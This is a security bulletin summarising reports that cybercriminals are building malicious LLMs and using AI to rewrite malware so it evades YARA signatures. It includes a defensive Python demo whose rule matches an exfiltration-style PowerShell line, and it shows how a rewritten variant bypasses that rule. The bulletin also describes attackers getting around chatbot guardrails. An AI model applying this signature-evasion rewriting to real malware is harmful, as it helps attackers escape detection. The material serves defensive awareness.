Hackers Developing Malicious LLMs After WormGPT Falls Flat
Summary:
Researchers have noted that cybercriminals are increasingly interested in developing their own malicious large language models (LLMs) after existing tools such as WormGPT failed to meet their needs. Etay Maor, senior director of security strategy at Cato Networks, highlighted discussions among hackers in underground forums centered on ways to bypass the guardrails built into AI-powered chatbots. For instance, Maor pointed to a case on Telegram in which a Russian-speaking threat actor named Poena was actively recruiting AI and machine-learning experts to collaborate on developing malicious LLM products.
This growing interest in custom malicious LLMs is not limited to one class of cybercriminal: ransomware and malware operators are also following the trend. The surge in demand for AI talent stems from disappointment with custom tools advertised in underground markets, which failed to deliver the functionality threat actors wanted.
A report published by Recorded Future on March 19 examines how threat actors are leveraging generative AI to craft malware and exploits. The report identifies four primary malicious use cases for AI, including using LLMs to rewrite malware so that it evades string-based detections such as YARA rules. As a practical example, the researchers prompted an LLM to modify the source code of SteelHook, a PowerShell infostealer used by APT28, so that the altered sample bypassed an existing YARA detection.
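To illustrate why literal-string signatures are fragile against this kind of LLM-driven rewriting, the sketch below compiles a minimal YARA rule with the yara-python package and shows that a trivial surface rewrite of the matched string is enough to slip past it. The rule and code snippets are hypothetical examples for illustration, not taken from the Recorded Future report.

```python
# Minimal sketch (assumes the yara-python package: pip install yara-python).
# Demonstrates why a literal-string YARA rule is brittle against the kind
# of source rewriting an LLM can apply mechanically across a whole sample.
# The rule and both snippets below are hypothetical, not from the report.
import yara

# A simple rule keyed on a literal string an analyst might extract
# from a PowerShell infostealer sample.
RULE_SOURCE = r'''
rule demo_infostealer_string
{
    strings:
        $s1 = "Invoke-WebRequest -Uri $exfilUrl" ascii
    condition:
        $s1
}
'''

rules = yara.compile(source=RULE_SOURCE)

# Original snippet: contains the literal string, so the rule fires.
original = b'$data = Invoke-WebRequest -Uri $exfilUrl -Method Post'

# Rewritten variant: same behavior, different surface text (renamed
# variable, "iwr" alias for Invoke-WebRequest) -- exactly the sort of
# change an LLM can make while preserving functionality.
rewritten = b'$data = iwr -Uri $dropUrl -Method Post'

print(rules.match(data=original))   # [demo_infostealer_string]
print(rules.match(data=rewritten))  # []  -- the string-based rule no longer fires
```

The rewritten snippet is functionally equivalent, yet the signature misses it, which is why detection engineering that keys on behavior or structure holds up better than literal strings against automated rewriting.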
Security Officer Comments:
Recorded Future also sheds light on the potential use of multimodal AI by advanced nation-state actors to sort through vast amounts of intelligence data and identify vulnerabilities in critical systems such as industrial control systems (ICS). However, access to the high-powered computing resources this requires remains a significant barrier for lower-tier threat actors, limiting their operations to simpler activities such as crafting phishing emails.
Suggested Corrections:
Researchers at Recorded Future recommend several mitigations for countering AI-generated polymorphic malware strains; the full list of recommendations is detailed in the report linked below.
Link(s):
https://www.databreachtoday.com/hackers-developing-malicious-llms-after-wormgpt-falls-flat-a-24724
https://www.recordedfuture.com/adversarial-intelligence-red-teaming-malicious-use-cases-ai